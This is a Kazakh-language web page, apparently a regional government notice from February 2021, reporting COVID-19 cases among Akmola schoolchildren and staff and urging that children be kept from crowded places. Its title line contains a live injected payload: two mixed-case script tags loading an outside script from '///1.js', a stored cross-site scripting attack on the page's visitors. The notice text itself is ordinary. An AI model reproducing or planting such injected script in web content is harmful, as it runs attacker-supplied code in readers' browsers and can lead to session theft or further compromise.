Санитарлық-эпидемологиялық бақылау департаментінің хабарламасы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.02.2021

Ақмола облысының санитарлық-эпидемиологиялық бақылау департаменті келесіні хабарлайды.

Пандемия басталғаннан бері оқушылар арасында covid-19 зертханалық расталған 505 жағдай тіркелді, оның ішінде штаттық режимде(оффлайн) оқушылар арасында-195 оқушы, қашықтықтан оқытуда (онлайн) - 310.

Ағымдағы жылдың 1 қаңтарынан бастап Оқушылар арасында аурудың 253 жағдайы тіркелді, оның ішінде ІІІ тоқсанның 3 аптасында 105 жағдай оффлайн режимде (41,5%).

Сонымен қатар, оқу жылының басынан бастап жалпы білім беретін мектептердің оқытушылары мен қызметкерлері арасында оффлайн режимде жұмыс істейтін 91 жағдай тіркелді. (52,3%).

Осыған байланысты, оқушылар мен білім беру мекемелерінің қызметкерлері арасында аурудың таралуын және өсуін болдырмау мақсатында балалардың адамдар көп жиналатын орындарға, оның ішінде мұз қалашықтарына баруына тыйым салу туралы ата-аналармен (ата-аналар чаттары арқылы) мәселені пысықтау қажет.

Просмотров: 424


Пікір қосу



Деректерді қолтаңбаға қосу